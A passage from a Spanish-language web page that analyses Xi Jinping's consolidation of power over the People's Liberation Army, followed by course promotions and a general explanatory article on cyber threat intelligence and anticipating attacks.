Durante la Revolución Cultural, Xi fue enviado a un campo de reeducación. Lejos de romper con el sistema, reforzó su lealtad al Partido como vía de redención y ascenso. Su madre, Qi Xin, militante comunista, mantuvo redes discretas y leales durante el ostracismo, reforzando en Xi la idea de que la supervivencia depende de estructuras internas, no de visibilidad pública.

De esa biografía Xi extrae tres brújulas:

  1. Lealtad férrea al Partido como condición de éxito.
  2. Disciplina organizativa y aceptación de la jerarquía para navegar purgas y equilibrios inestables.
  3. «El Partido manda sobre el fusil»: controlar la CMC y disciplinar al EPL es continuidad, no innovación.

Su narrativa pública —trabajo duro, aguante y transformación en Liangjiahe— legitima un estilo de purgas quirúrgicas, control ideológico permanente y centralización estable.

Antes de Xi: fragmentación, corrupción y pérdida de control civil

Las reformas de Deng Xiaoping modernizaron la economía, pero debilitaron el control político sobre los militares. El EPL se autonomizó, se clientelizó y se instaló en la corrupción mientras el centro priorizaba el crecimiento.

Con Jiang Zemin y Hu Jintao, la descentralización y las facciones (Liga de la Juventud, príncipes rojos, redes provinciales) derivaron en gobernanza fragmentada e incrementalista. El mensaje del centro se diluía y las reformas se ralentizaban.

Para Xi, aquello amenazaba la supervivencia del régimen. La campaña anticorrupción se convirtió en arma política para desarticular redes rivales, transmitir que nadie es intocable y promocionar cuadros leales/competentes. Resultado: recentralización de presupuestos, ascensos y adquisiciones bajo la CMC.

➡️ Te puede interesar: La geopolítica de la mafia china: orígenes, expansión y poder global de las Tríadas

En 2023–2024, la lógica se intensificó con destituciones de ministros y altos mandos (incluso protegidos de Xi): un patrón que consolida la obediencia a corto plazo, pero aumenta la fragilidad a largo.

La obsesión central: evitar «otro 1991». Según la lectura de Pekín, la URSS cayó por pérdida de control ideológico, apolitización del ejército y captura oligárquica del Estado. Xi reacciona blindando al Partido, subordinando el EPL a la CMC y rotando/inspeccionando mandos para evitar feudos.

Xi y el Ejército Popular de Liberación: pilar y talón de Aquiles

El proyecto de Xi Jinping con el Ejército Popular de Liberación (EPL) responde a dos obsesiones centrales: modernizarlo para la guerra multidominio (ciberespacio, espacio exterior e inteligencia artificial) y garantizar su lealtad absoluta al Partido Comunista. En su visión, el EPL no es un instrumento al servicio de la nación, sino el garante último de la supervivencia del régimen.

Las reformas emprendidas desde 2015 lo reflejan. Ese año, Xi disolvió los cuatro departamentos generales y los sustituyó por quince órganos bajo control directo de la Comisión Militar Central (CMC), reduciendo al mínimo la autonomía militar. Dos años después, la propia CMC pasó de once a siete miembros, y en puestos clave se situaron figuras de su máxima confianza, como Zhong Shaojun, su asesor civil más cercano.

Además, se reequilibró la estructura militar: el Ejército de Tierra perdió hegemonía en favor de la Armada, la Fuerza Aérea y la Fuerza de Misiles, adaptando al EPL a los nuevos escenarios de guerra multidominio.

Estas medidas se sustentan en una lógica clara. La experiencia de Tiananmén en 1989 dejó grabada en la élite la idea de que el ejército debe estar siempre listo no solo para responder a amenazas externas, sino también para sofocar desafíos internos, incluida la sociedad civil. En otras palabras: el EPL es el guardián del Partido, no del Estado.

Los riesgos de un ejército moderno

La modernización, sin embargo, abre dilemas peligrosos:

  • Un EPL más profesional y nacionalista podría empezar a verse como defensor del Estado por encima del Partido.
  • La corrupción heredada y las redes clientelares han creado feudos militares más leales a patronos que al centro.
  • El auge del nacionalismo militar añade la posibilidad de que algunos mandos desarrollen agendas propias.

Xi ha reaccionado con una estrategia que combina la recentralización en la CMC, un discurso disciplinario constante y la campaña anticorrupción como mecanismo de purga política. Con ello ha neutralizado facciones rivales bajo la narrativa de moralización.

Objetivos estratégicos de China y la paradoja del poder de Xi Jinping

Los objetivos estratégicos de esta transformación son claros:

  • Preparar una posible reunificación forzosa de Taiwán.
  • Mantener la rivalidad con Estados Unidos en el terreno militar.
  • Desarrollar capacidades tecnológicas avanzadas en dominios emergentes.

➡️ Te puede interesar: ¿Rusia y China seguirán siendo aliados? Prospectiva sobre una hermandad con fecha de caducidad

Pero aquí emerge la paradoja central: cuanto más fuerte y moderno se vuelve el EPL, más autonomía potencial acumula. Y cuanta más autonomía acumula, mayor es el riesgo de que deje de ser un simple instrumento del Partido para convertirse en un actor con vida propia. De ahí que el pilar del poder de Xi sea también su talón de Aquiles.

Conclusión: ¿anomalía o continuidad?

Los regímenes personalistas viven en alerta permanente: una mala decisión puede desencadenar crisis. De ahí el impulso de Xi por controlar todos los engranajes del Partido-Estado y colocar cuadros leales.

Aun así, persiste información deficiente, corrupción (p. ej., fallos en misiles y adquisiciones) y débil voluntad política en niveles intermedios. Xi aprendió del caos de la Revolución Cultural que las movilizaciones incontroladas destruyen instituciones; su apuesta es disciplina burocrática y control ideológico estable.

Su reto real no es solo permanecer en el poder, sino dejar instituciones que sobrevivan a su salida. La institucionalización del «xiísmo» depende de resultados, de una sucesión ordenada y de evitar que el EPL derive en actor autónomo. La historia china sugiere que la hipercentralización rara vez es duradera: Xi no es el destino final de China, sino una fase en su ciclo de unidad y dispersión.


➡️ Si quieres adquirir conocimientos sobre Geopolítica y análisis internacional, te recomendamos los siguientes cursos formativos:

Ciberinteligencia: cómo se anticipan los ataques antes de que ocurran

Las organizaciones que emplean la Ciberinteligencia no esperan a ser atacadas, sino que actúan con prevención, análisis y visión estratégica. Descubre cómo esta práctica permite anticipar ciberataques antes de que ocurran y aprende a detectar señales tempranas y protegerte.

En un mundo donde los ciberataques ya no son excepción, sino norma, las empresas, gobiernos y particulares enfrentan el desafío constante de proteger su información antes de que el daño ocurra. Cada día aparecen nuevas amenazas digitales, más sofisticadas y silenciosas. En este contexto, surge una disciplina clave que cambia la lógica de la defensa informática: la Ciberinteligencia. No se trata de reaccionar, sino de prever. De transformar los datos en conocimiento y las señales en decisiones.

Qué es la Ciberinteligencia y de qué se encarga

La Ciberinteligencia es la práctica de recopilar, analizar y usar información procedente del ciberespacio con el objetivo de anticipar amenazas y prevenir incidentes. Su papel va más allá de la ciberseguridad tradicional. Mientras la seguridad informática protege los sistemas, esta busca entender el comportamiento de los atacantes, detectar patrones y prever sus próximos movimientos.

➡️ Te puede interesar: Curso de Ciberinteligencia de Amenazas

Su trabajo combina la observación continua, los análisis de tendencias y la evaluación de riesgos. En otras palabras, permite que una organización no solo reaccione ante los ataques, sino que los vea venir con tiempo suficiente para neutralizarlos o minimizar su impacto. En la práctica, significa pasar de un modelo reactivo a uno proactivo de defensa digital.

Fuentes de información: el primer paso para anticipar

Toda operación de Ciberinteligencia comienza con la recopilación de datos. Las fuentes son múltiples y diversas: redes sociales, foros, registros de incidentes de seguridad, direcciones IP sospechosas o dominios vinculados a actividades maliciosas. También se monitorean campañas de phishing, movimientos en el mercado negro digital y vulnerabilidades recién descubiertas.

➡️ Te puede interesar: Curso de Experto en Inteligencia Estratégica

A través de diferentes herramientas de rastreo y análisis automatizado, los analistas filtran grandes volúmenes de información buscando las señales tempranas que alerten de un posible ataque. De esta forma, se construye un mapa del entorno digital que permite entender qué actores podrían estar planeando una ofensiva, cómo operan y cuál es su objetivo.

De la información al conocimiento: el análisis estratégico

El verdadero valor de la Ciberinteligencia radica en la interpretación. Los datos por sí solos no dicen nada. Por eso, lo esencial es el análisis que los convierte en conocimiento operativo.

Los especialistas cruzan la información técnica con el contexto geopolítico, económico o social para determinar la posible motivación detrás de un ataque. Por ejemplo, un aumento de tráfico no identificado puede no ser un error técnico, sino una preparación para una infiltración mayor.

El análisis estratégico permite identificar no solo las amenazas actuales, sino las tendencias emergentes. Así, las organizaciones pueden adaptar sus protocolos y evitar quedar expuestas en el futuro.

Tipos de Ciberinteligencia: desde lo técnico hasta lo humano

La disciplina se organiza en diferentes niveles que se complementan entre sí:

  • Ciberinteligencia táctica: analiza indicadores técnicos (como IPs o malware) para detectar ataques en tiempo real.
  • Ciberinteligencia operativa: estudia campañas o grupos específicos, examinando sus métodos y herramientas.
  • Ciberinteligencia estratégica: ofrece una visión de largo plazo, identificando riesgos y su impacto potencial en la seguridad de la organización.

A estos tres niveles se suma el factor humano. Las personas siguen siendo el eslabón más vulnerable y, a la vez, una fuente valiosa de información. Analizar comportamientos, hábitos de uso y patrones internos ayuda a prevenir amenazas internas o filtraciones involuntarias.

Cómo se predicen los ataques antes de que ocurran

Anticipar un ataque es posible porque los cibercriminales siempre dejan rastros, aunque mínimos. Cada conexión sospechosa, mensaje cifrado o transacción irregular puede ser una pieza del rompecabezas. Ahí es donde la Ciberinteligencia, mediante el uso de herramientas, análisis y técnicas, detectan anomalías antes de que se conviertan en incidentes.

➡️ Te puede interesar: Curso-Certificado de Experto en Ciberinteligencia

Una parte esencial de este proceso es la correlación de eventos. Si se detecta una actividad inusual en una región o en un sector específico, los analistas pueden proyectar escenarios probables y reforzar defensas anticipadamente. Del mismo modo, las alertas tempranas provenientes de redes compartidas o de centros de información globales permiten reaccionar en cuestión de horas, en lugar de días.

El papel de la colaboración internacional

En la mayoría de ocasiones, la efectividad de la Ciberinteligencia aumenta cuando se comparte información. Ninguna organización puede vigilar todo el ciberespacio por sí sola. Por ello, los acuerdos entre gobiernos, empresas tecnológicas y centros de investigación son fundamentales.

Los programas internacionales de intercambio de datos permiten identificar patrones de ataque que ya han sido detectados en otros lugares. Por ejemplo, si un malware afecta a una institución en Asia, las redes de Ciberinteligencia europeas pueden estudiar sus características y preparar medidas preventivas antes de que llegue al continente.

Aplicaciones de la Ciberinteligencia en el mundo real

Los sectores críticos como los financieros, energéticos y de defensa son los que más dependen de la anticipación. Una empresa eléctrica, por ejemplo, puede usar la Ciberinteligencia para detectar intentos de sabotaje antes de que se vean afectados sus sistemas.

➡️ Te puede interesar: Curso de Prevención y Gestión de Ciberriesgos y Ciberataques

En el ámbito bancario, las alertas sobre movimientos sospechosos en la web oscura ayudan a evitar fraudes masivos o filtraciones de datos de clientes. Incluso las pymes pueden beneficiarse de esta práctica mediante servicios de inteligencia digital adaptados a su tamaño. En todos los casos, el objetivo es el mismo: actuar antes de que el ataque golpee.

Retos y futuro de la Ciberinteligencia

El crecimiento del Internet de las Cosas, la inteligencia artificial generativa y la digitalización total de los servicios hacen que el campo de la Ciberinteligencia sea más necesario que nunca. Sin embargo, también enfrenta desafíos. Los nuevos ataques son más automatizados, más sutiles y difíciles de rastrear. Además, las limitaciones legales o éticas sobre la recopilación de datos suponen un equilibrio delicado entre la seguridad y la privacidad. El futuro pasa por combinar la tecnología avanzada con una cultura digital sólida.